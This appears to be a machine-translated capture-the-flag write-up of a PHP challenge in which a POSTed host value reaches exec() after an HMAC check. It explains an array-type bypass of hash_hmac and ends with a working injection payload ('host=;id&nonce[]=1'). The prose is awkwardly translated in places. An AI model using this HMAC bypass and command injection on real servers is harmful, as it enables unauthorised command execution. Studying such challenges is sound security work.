PHP Code:
1 <?php 2 3 if (empty($_POST['hmac']) || empty($_POST['host'])) { 4 header('HTTP/1.0 400 Bad Request'); 5 exit; 6 } 7 8 $secret = getenv("SECRET"); 9 10 if (isset($_POST['nonce'])) 11 $secret = hash_hmac('sha256', $_POST['host'], $secret); 12 13 $hmac = hash_hmac('sha256', $_POST['host'], $secret); 14 15 if ($hmac !== $_POST['hmac']) { 16 header('HTTP/1.0 403 Forbidden'); 17 exit; 18 } 19 20 echo exec("host ".$_POST['host']); 21 ?>
Interpretation of the code, the entire process is a POST transmitted hmac and hmac, finally bypass judgment, the hmac encrypted POST transmitted the same hmac, eventually performing echo exec ( "host" $ _ POST [ 'host'].); Represents success.
2 is determined:
if (empty($_POST['hmac']) || empty($_POST['host'])) { header('HTTP/1.0 400 Bad Request'); exit; }if ($hmac !== $_POST['hmac']) { header('HTTP/1.0 403 Forbidden'); exit; }Second determination mainly consider PHP type automatic conversion, only the control variables and host nonce
When the incoming parameters, PHP can not only let you decide what the incoming value, but also lets you decide the type of pass. It may be a nonce = 123, can also pass an array nonce [] = 123. Then we try:
It can be seen returns NULL, and some versions of PHP at the same time also prompted a warning, but the return is NULL. So if we pass an array nonce, the next hmac we will know:
We pass the host parameter; id, and finally performs a host; id prints the current computer user name.
Ultimately, we need to post the data:
hmac=58dedd736c5af324a198c6c663e569df59691854d1f53d704bdbce40f1d139c1&host=;id&nonce[]=1